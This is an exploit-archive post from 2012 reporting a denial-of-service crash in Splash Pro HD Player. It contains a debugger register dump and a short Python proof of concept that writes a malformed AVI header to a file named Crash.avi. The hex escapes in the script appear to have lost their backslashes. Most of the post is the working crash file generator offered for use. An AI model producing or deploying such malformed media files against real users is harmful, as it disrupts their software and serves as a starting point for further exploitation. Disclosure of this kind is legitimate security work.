Home / exploitsPDF  

Splash Pro HD Player Denial Of Service

Posted on 03 March 2012

########################################################################################################### Application : Splash Pro Hd Player (.avi) Denial of Service Date : 02/03/2012 Auther : Senator of Pirates E-Mail : Senator.of.Pirates.team@gmail.com FaceBook : /SenatorofPirates Greet : i greet to Gjoko 'LiquidWorm' Krstic and my friends in anywhere and also every Moroccan ########################################################################################################### Bug : ---- eax=023211e0 ebx=02327760 ecx=00000001 edx=45520fea esi=bce8af7e edi=45523258 eip=0045ed3e esp=0c17ff08 ebp=02323448 iopl=0 nv up ei pl nz ac po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010212 *** ERROR: Module load completed but symbols could not be loaded for image00400000 image00400000+0x5ed3e: 0045ed3e 803e4c cmp byte ptr [esi],4Ch ds:0023:bce8af7e=?? ############################################################################################################ Code : ---------------- PoC = "x52x49x46x46x3cxadx08x00x41x56x49x20x4cx49x53x54" PoC += "x72x22x00x00x68x64x72x6c" payload = (PoC) f = open("Crash.avi","wb") f.write(payload) f.close()

 

TOP